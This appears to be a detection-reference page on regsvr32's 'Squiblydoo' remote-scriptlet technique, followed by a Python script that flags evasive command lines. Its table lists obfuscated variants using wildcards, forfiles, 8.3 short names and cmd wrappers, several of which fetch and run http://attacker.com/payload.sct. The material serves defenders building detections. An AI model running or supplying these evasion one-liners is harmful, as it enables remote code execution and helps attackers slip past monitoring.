regsvr32
Registers and unregisters OLE controls. Can execute remote scriptlets (scrobj.dll) — the 'Squiblydoo' technique.
Binary Paths
C:\Windows\System32\regsvr32.exe
C:\Windows\SysWOW64\regsvr32.exe
Glob Patterns
| Pattern | Notes |
|---|---|
| `for /f %i in ('where regsvr3?.exe') do %i` | Wildcard replaces '2' |
| `for /f %i in ('where r*svr32.exe') do %i` | Star replaces 'eg' |
| `for /f %i in ('where regsvr*.exe') do %i` | Star matches '32' |
| `for /f %i in ('dir /b C:\Windows\System32\regsvr*.exe') do %i` | dir glob search |
| `for %i in (C:\Windows\System32\regsvr*.exe) do @%i /s /n /u /i:http://attacker.com/payload.sct scrobj.dll` | Native CMD for loop with filesystem glob — expands regsvr*.exe directly in System32 without where.exe |
| `for /f %i in ('where /r C:\Windows regsvr*.exe') do %i /s /n /u /i:http://attacker.com/payload.sct scrobj.dll` | Recursive where search across Windows tree — finds regsvr32.exe in System32 and SysWOW64 |
| `forfiles /p C:\Windows\System32 /m regsvr*.exe /c "@file /s /n /u /i:http://attacker.com/payload.sct scrobj.dll"` | forfiles * mask finds regsvr32.exe — @file expands to matched filename for Squiblydoo execution |
| `C:\Windows\System32\REGSVR~1.EXE /s /n /u /i:http://attacker.com/payload.sct scrobj.dll` | 8.3 SFN — REGSVR~1 auto-generated for regsvr32.exe; requires NtfsDisable8dot3NameCreation=0 |
| `cmd /c for /f %i in ('where regsvr*.exe') do %i /s /n /u /i:http://attacker.com/payload.sct scrobj.dll` | cmd /c wrapper adds an extra process layer — glob resolves via where; parent process becomes cmd.exe not the caller |
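A defender-side check for the patterns in the table, as an added example (not part of the original page or of any published rule set): it tests whether any `.exe` token on a logged command line is a wildcard or 8.3 short name that can resolve to regsvr32.exe, and whether the `/i:` URL plus scrobj.dll arguments are present. The function names, the sample command lines and the example.test URL are constructed for illustration.

```python
import fnmatch
import re

TARGET = "regsvr32.exe"
# Any token ending in .exe, without the quotes/parentheses cmd wraps around it.
EXE_TOKEN = re.compile(r"[^\s'\"()]+\.exe", re.IGNORECASE)
REMOTE_I = re.compile(r"/i:https?://", re.IGNORECASE)
# 8.3 short name: first six characters of the long name, "~", one digit.
SFN = re.compile(r"regsvr~\d\.exe")


def resolves_to_regsvr32(token):
    """Return 'literal', 'glob' or 'sfn' if the token can reach regsvr32.exe, else None."""
    name = token.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if name == TARGET:
        return "literal"
    # Treat the token as a glob and ask whether the real file name matches it.
    if any(c in name for c in "*?") and fnmatch.fnmatchcase(TARGET, name):
        return "glob"
    if SFN.fullmatch(name):
        return "sfn"
    return None


def classify(cmdline):
    """Return (how regsvr32 is reached, whether the remote-scriptlet arguments are present)."""
    via = None
    for tok in EXE_TOKEN.findall(cmdline):
        via = resolves_to_regsvr32(tok)
        if via:
            break
    squiblydoo = bool(REMOTE_I.search(cmdline)) and "scrobj.dll" in cmdline.lower()
    return via, squiblydoo


# Constructed sample command lines (not taken from real telemetry).
SAMPLES = [
    r"for /f %i in ('where regsvr3?.exe') do %i",
    r"C:\Windows\System32\REGSVR~1.EXE /s /n /u /i:http://example.test/x.sct scrobj.dll",
    r'forfiles /p C:\Windows\System32 /m regsvr*.exe /c "@file /s /n /u /i:http://example.test/x.sct scrobj.dll"',
    r"regsvr32.exe /s C:\Program Files\App\control.dll",
    r"for /f %i in ('where notepad*.exe') do %i",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), line)
```

A broad glob such as `reg*.exe` is also reported as `glob`, because it can resolve to regsvr32.exe among other binaries; treat that result as a lead to review rather than a verdict.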
YARA Rule
Auto-generated detection rule for regsvr32